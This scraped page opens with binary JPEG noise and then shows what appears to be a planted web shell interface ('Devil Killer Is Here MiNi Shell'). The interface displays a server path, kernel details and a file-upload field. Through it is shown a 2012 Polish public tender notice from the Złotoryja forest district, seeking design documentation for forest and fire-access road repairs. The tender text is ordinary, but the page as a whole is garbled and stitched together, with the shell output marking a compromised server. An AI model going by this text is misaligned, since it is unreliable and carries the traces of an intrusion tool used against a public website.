JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120829/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120829/319936-N-2012.html

<p class="kh_header"><b>Złotoryja: Opracowanie dokumentacji projektowej dla zadania Remont połączony z modernizacją dojazdów pożarowych i dróg leśnych w Nadleśnictwie Złotoryja</b><br>
<b>Numer ogłoszenia: 319936 - 2012; data zamieszczenia: 29.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Złotoryja , ul. Staszica 18, 59-500 Złotoryja, woj. dolnośląskie, tel. 076 8788307(308).</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wroclaw.lasy.gov.pl/zlotoryja</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Lasy Państwowe.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowej dla zadania Remont połączony z modernizacją dojazdów pożarowych i dróg leśnych w Nadleśnictwie Złotoryja.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  opracowanie dokumentacji projektowej na zadanie pod nazwą Remont połączony z modernizacją dojazdów pożarowych i dróg leśnych w Nadleśnictwie Złotoryja.

Dokumentacja projektowo - techniczna sporządzona zgodnie z Rozporządzeniem Ministra Infrastruktury  z dnia 02.09.2004 r. w sprawie określenia szczegółowego zakresu i formy dokumentacji projektowej ( Dz. U. z 2004 r. Nr 202, poz. 2072 z późn. zm.) obejmuje następujący zakres:
a) określenie parametrów technicznych obiektów przy uwzględnieniu lokalizacji i ukształtowania terenu, a w razie konieczności zaproponowanie alternatywnych rozwiązań projektowych

b) przedstawienie propozycji ścieżki procesu inwestycyjno-proceduralnego poszczególnych obiektów zadania, co do wymagalności uzyskania decyzji administracyjnych

c) przedstawienie Nadleśnictwu do akceptacji opracowań projektowych 

d) uzyskanie decyzji o warunkach zabudowy - dla obiektów wymagających uzyskania takiej decyzji

e) sporządzenie projektu budowlanego - opracowany w zakresie zgodnym z art. 34 ust. 3 ustawy Prawo  budowlane oraz szczegółowości zgodnej z Rozporządzeniem Ministra Infrastruktury z dnia 3  lipca 2003r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. z  2003r. nr 120 poz. 1133 z późn. zm.)

f) projekty wykonawcze - uzupełniające i uszczegóławiające projekt budowlany w zakresie  i stopniu dokładności niezbędnym do sporządzenia przedmiaru robót, kosztorysu   
inwestorskiego, przygotowania oferty przez wykonawcę i realizacji robót budowlanych

g) przedmiar robót - zawierający szczegółowe zestawienie przewidywanych do wykonania   
robót w kolejności technologicznej ich wykonania wraz z ich szczegółowym opisem, z wyliczeniem i zestawieniem ilości jednostek przedmiarowych robót.

h) informacja BIOZ - uwzględniająca warunki Rozporządzenia Ministra Infrastruktury z dnia 23  czerwca 2003r. w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu  bezpieczeństwa i ochrony zdrowia (Dz. U. z 2003r. nr 120, poz. 1126)

i) specyfikacja techniczna wykonania i odbioru robót budowlanych (STWiOR) - zawierająca  zbiory wymagań w zakresie sposobu wykonania robót budowlanych; obejmująca w szczególności wymagania co do właściwości materiałów, sposobu wykonania i oceny  prawidłowości wykonania poszczególnych robót, określająca standard urządzeń i materiałów mające wpływ na cenę robót, obejmująca zaplecze budowy oraz punkty poboru wody i energii elektrycznej dla celów zaplecza i technologicznych oraz uzgodnienia ich z dystrybutorami dla  celów budowy

j) szczegółowy kosztorys inwestorski- sporządzony zgodnie z wytycznymi zawartymi w Rozporządzeniu Ministra Infrastruktury z dnia 18 maja 2004r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania  planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych  określonych w programie funkcjonalno-użytkowym (Dz. U. z 2004r. nr 130, poz. 1389).

Opracowania opisane w punkcie od e) do g) należy wykonać w pięciu egzemplarzach papierowych i elektronicznym (płyty CD w formatach: dla plików tekstowych DOC oraz dla plików nieedytowalnych w formacie *pdf o max. wielkości do 2MB). Dokumentacja winna być sprawdzona przez osobę z uprawnieniami (podpis i pieczęć projektanta i sprawdzającego na każdym egzemplarzu papierowym).

k) wykonanie raportu oddziaływania na środowisko oraz uzyskanie decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia - jeżeli zostanie stwierdzona potrzeba uzyskania takiej decyzji

l) uzyskanie prawomocnej decyzji o pozwoleniu na budowę

m) nadzór autorski nad realizacją zadania polegający na:

- pełnieniu nadzoru autorskiego w ilości minimum 3 pobytów projektantów na zadaniu.  
Pełnienie nadzoru autorskiego odbywać się będzie każdorazowo na wezwanie  
Zamawiającego, z przynajmniej 3 dniowym wyprzedzeniem. Pobyt projektanta na budowie   wynikający z błędów projektowych nie jest pobytem w ramach nadzoru autorskiego i Zamawiający nie ponosi kosztów tego pobytu,

- uzupełnieniu szczegółów dokumentacji projektowej,

- wyjaśnieniu wykonawcy robót budowlanych wątpliwości powstałych w toku realizacji robót..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium w wysokości 300 zł na każdą część zamówienia.
 
2. Wadium może być wnoszone wedle wyboru wykonawcy w jednej lub kilku następujących formach:
1)	pieniądzu;
2)	poręczeniach bankowych i poręczenia spółdzielczych kas oszczędnościowo - kredytowych, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3)	gwarancjach bankowych;
4)	gwarancjach ubezpieczeniowych;
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jedn. Dz. U. z 2007 r. Nr 42, poz. 275, z późn. zm.).
Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy zamawiającego: 35 1090 2095 0000 0005 4800 4494. Wadium w formie gotówki nie będzie przyjmowane. Wadia wnoszone w innych formach niż pieniądz : oryginały należy złożyć w ofercie, natomiast po otwarciu ofert Zamawiający zdeponuje wadia w postaci niepieniężnej w kasie nadleśnictwa. 

3. Wadium należy wnieść w terminie do dnia 06.09.2012 r. do godz. 12:00. W przypadku wniesienia wadium w pieniądzu, za moment wniesienia wadium uznaje się moment uznania rachunku zamawiającego.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)  wykonanie w okresie ostatnich 3 lat przed upływem terminu składania ofert (a jeżeli okres wykonywania działalności gospodarczej jest krótszy - w tym okresie) minimum 1 zamówienia  polegającego na  opracowaniu dokumentacji technicznej w drogowej  o wartości dokumentacji co najmniej 50 000 zł brutto na każdą część zamówienia.
Wykonawca nie może wskazywać tych samych robót  w celu wykazania spełniania warunków udziału w postępowaniu  w więcej niż jednej części zamówienia, chyba że wartość wykonanego zadania jest nie mniejsza niż suma poszczególnych wymaganych kwot na zadania ( np. jeśli Wykonawca złoży ofertę na zadania 1 i 2 - to może wykazać 2 różne zadania o wartości co najmniej 50  000 zł brutto każde lub jedno zadanie o wartości nie mniejszej niż  100 000 zł brutto)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)  wykonawca wskaże do uczestnictwa w wykonaniu niniejszego zamówienia osobę
posiadającą podstawę do wykonywania samodzielnych funkcji technicznych w budownictwie, obejmującą co najmniej projektowanie,  sprawdzanie projektów architektoniczno - budowlanych, sprawowanie nadzoru autorskiego   zgodnie z ustawą z 7 lipca 1994r. Prawo Budowlane (Dz.U. z 2010 nr 243 poz. 1623 z późn. zm.) w specjalności drogowej lub inne odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz nadają co najmniej takie uprawnienia, jak ww. uprawnienia 
Wskazane przez Wykonawcę osoby, bez względu na kraj ich pochodzenia i miejsce zamieszkania, muszą spełniać wymogi określone w art. 12 a ustawy z dnia 7 lipca 1994 r - Prawo Budowlane ( tj. Dz.U. z 2010 r nr 243, poz. 1623 ze zm.)

Wykonawca może wskazywać te same osoby w więcej niż jednej części zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zastrzega możliwość zmiany zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej okoliczności wymienionej poniżej:
a)  Jeżeli w trakcie zamówienia okaże się, że realizacja przedsięwzięcia w zaplanowanym miejscu może nie przenieść zamierzonego efektu, to istnieje konieczność zmiany lokalizacji inwestycji,

b) Jeżeli wystąpi redukcja wartości dotacji z uwagi na wycofanie dotacji, jej zmniejszenie lub nieosiągnięcie pełnej wysokości dotacji w stosunku do wielkości  określonej we wniosku o dotacje to istnieje możliwość redukcji przedmiotu zamówienia,

c) Nastąpi wywierająca bezpośredni wpływ na dalsze wykonanie umowy zmiana obowiązującego prawa powszechnego (np. ustawy , rozporządzenia) bądź  przepisów wewnętrznych obowiązujących w  Państwowym Gospodarstwie Leśnym Lasy Państwowe ( zarządzenia, decyzje, wytyczne Dyrektora Generalnego Lasów Państwowych),

d) Wystąpi zmiana Wykonawcy w przypadku sukcesji generalnej następującej wyniku dozwolonego przekształcenia  podmiotu bądź dziedziczenia oraz  w przypadku szczególnej sukcesji z mocy prawa ( np. łączenie, dzielenie, przekształcenie spółek),

e) Wystąpi konieczność powierzenia wykonania części zakresu umowy podwykonawcy,

f) Wystąpi konieczność zmiany osób wykonujących samodzielnie funkcje techniczne w budownictwie określonej  w art.12 ustawy z dnia 7 lipca 1994 r. prawo budowlane (tekst jednolity Dz.U . z 2010 r. , Nr 243, poz.1623 z późn. zmianami),

g) Wystąpi konieczność zmiany ( wydłużenia lub skrócenia) terminów umownych  zakończenia umowy z uwagi na :
-panujące niekorzystne warunki atmosferyczne,
-wydłużenie terminów uzyskania wymaganych pozwoleń administracyjnych,
-udzielenie zamówień dodatkowych,
-przeprowadzenie procedur z udziałem społeczeństwa i organizacji pozarządowych,
-zmiany spowodowane nieprzewidzianymi w SIWZ  warunkami geologicznymi, archeologicznymi lub terenowymi,
-wcześniejsze wykonanie zamówienia.

h)   Jeżeli wystąpi odmowa wydania przez organy administracji  lub inne podmioty wymaganych decyzji, zezwoleń z przyczyn niezawinionych przez Wykonawcę, może zaistnieć koniczność zmiany lokalizacji inwestycji ,
i)   W  wyniku urzędowej zmiany stawki podatku VAT , podatek VAT naliczony zostanie do ceny netto na fakturze wg stawki zgodnej z obowiązującym prawem w dniu wystawienia protokołu odbioru robót, co nie dotyczy przypadków objęcia Wykonawcy, który w dniu podpisania umowy nie był płatnikiem VAT, obowiązkiem podatkowym w zakresie tego podatku ,

j)   Zaistnieją warunki ustalenia wcześniejszego terminu zakończenia, rozliczenia umowy i wystawienia faktury końcowej w przypadku wcześniejszego wykonania usług objętych umową,

k)  W razie zaistnienia zdarzeń niezależnych od stron, po dacie zawarcia umowy, o charakterze działania siły wyższej, które uniemożliwiłyby terminowe wykonanie zobowiązań - strony zobowiązują się do wspólnego określenia nowego terminu realizacji przedmiotu umowy,

l)   W związku z zaistnieniem okoliczności, których wystąpienia Zamawiający i Wykonawca nie przewidywali w chwili zawierania Umowy. Wskazane okoliczności nie mogą być wywołane zarówno przez Zamawiającego, jak i Wykonawcę, ani przez nich zawinione i muszą wywoływać ten skutek, iż Umowa nie będzie mogła być wykonana wedle pierwotnej treści, w szczególności z uwagi na rażącą stratę grożącą jednemu z nich lub niemożność osiągnięcia celu Umowy. Okoliczności te odnosić się mogą w szczególności do wystąpienia nagłych zmian stanu prawnego, gwałtownej dekoniunktury, kryzysów finansowych w skali ponadpaństwowej, konieczności uwzględnienia wpływu ewentualnych prac zamiennych na realizację przedmiotu umowy. Niezależnie od powyższego, Zamawiający dopuszcza możliwość zmian redakcyjnych Umowy oraz zmian będących następstwem zmian danych zarówno jego, jak i Wykonawcy ujawnionych w rejestrach publicznych, a także zmian korzystnych z punktu widzenia realizacji przedmiotu umowy, w szczególności przyspieszających realizację, obniżających koszt ponoszony przez Zamawiającego na wykonanie, utrzymanie lub użytkowanie przedmiotu umowy bądź zwiększających użyteczność przedmiotu umowy. W takiej sytuacji, wprowadzone zostaną do umowy stosowne zmiany weryfikujące redakcyjne dotychczasowe brzmienie umowy bądź wskazujące nowe dane wynikające ze zmian w rejestrach publicznych albo też kierując się poszanowaniem wzajemnych interesów, zasadą równości oraz ekwiwalentności świadczeń i przede wszystkim zgodnym zamiarem wykonania przedmiotu umowy, określą zmiany korzystne z punktu widzenia realizacji przedmiotu umowy. Wszelkie zmiany wprowadzane do umowy dokonywane będą z poszanowaniem obowiązków wynikających z obowiązującego prawa, w tym w szczególności art. 140 ust. 3 PZP oraz zasad ogólnych rządzących tą ustawą.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wroclaw.lasy.gov.pl/zlotoryja<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Złotoryja, ul. Staszica 18, 59-500 Złotoryja.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.09.2012 godzina 12:00, miejsce: sekretariat Nadleśnictwa Złotoryja, ul. Staszica 18, 59-500 Złotoryja.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadania realizowane są w ramach działania  ,,Odtwarzanie potencjału produkcji leśnej zniszczonego przez katastrofy oraz wprowadzenie instrumentów zapobiegawczych w ramach działania Programu  Rozwoju Obszarów Wiejskich na lata 2007-2013. Projekt współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Rolnego na rzecz Rozwoju Obszarów Wiejskich..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> opracowanie dokumentacji projektowej dla zadania Remont połączony z modernizacją drogi leśnej w Nadleśnictwie Złotoryja, w leśnictwie Biskupin o szacunkowej długości ok. 2400 m.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lokalizacja drogi leśnej:
Leśnictwo: Biskupin ,oddz. 276, 278, 279,281, 284, powiat: bolesławiecki, gmina:Gromadka,obręb ewidencyjny : Osła
Działka nr: 684/284, 680/281, 677/278, 675/276, 696/279

Powiat: legnicki, gmina: Chojnów, obręb ewidencyjny : Krzywa
Działka nr: 488/278, 489/276.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.31.22.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> opracowanie dokumentacji projektowej dla zadania Remont połączony z modernizacją dojazdu pożarowego nr 16 A  i 17 w Nadleśnictwie Złotoryja, w leśnictwie Michałów o szacunkowej łącznej długości ok. 5460 m. Należy opracować dokumentacje oddzielnie dla każdego z dojazdów pożarowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dojazd pożarowy 16A Leśnictwo : Olszanica
Oddz. 39, 40, 47, 54, 55
Powiat: polkowicki 
Gmina: Chocianów obszar wiejski 
Obręb ewidencyjny Raków, działka nr: 361/39, 362/40
Obręb ewidencyjny Michałów, działka nr: 517/47, 523/54, 524/55, 526/55

Dojazd pożarowy 17 Leśnictwo : Olszanica
Oddz. 54, 65, 71, 72, 73, 74, 75, 76, 77, 78, 
Powiat: polkowicki 
Gmina: Chocianów obszar wiejski 
Obręb ewidencyjny : Michałów
Działka nr: 523/54, 536/65, 540/78, 491/77, 490/76, 489/75, 488/74, 487/73, 486/72, 1021.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
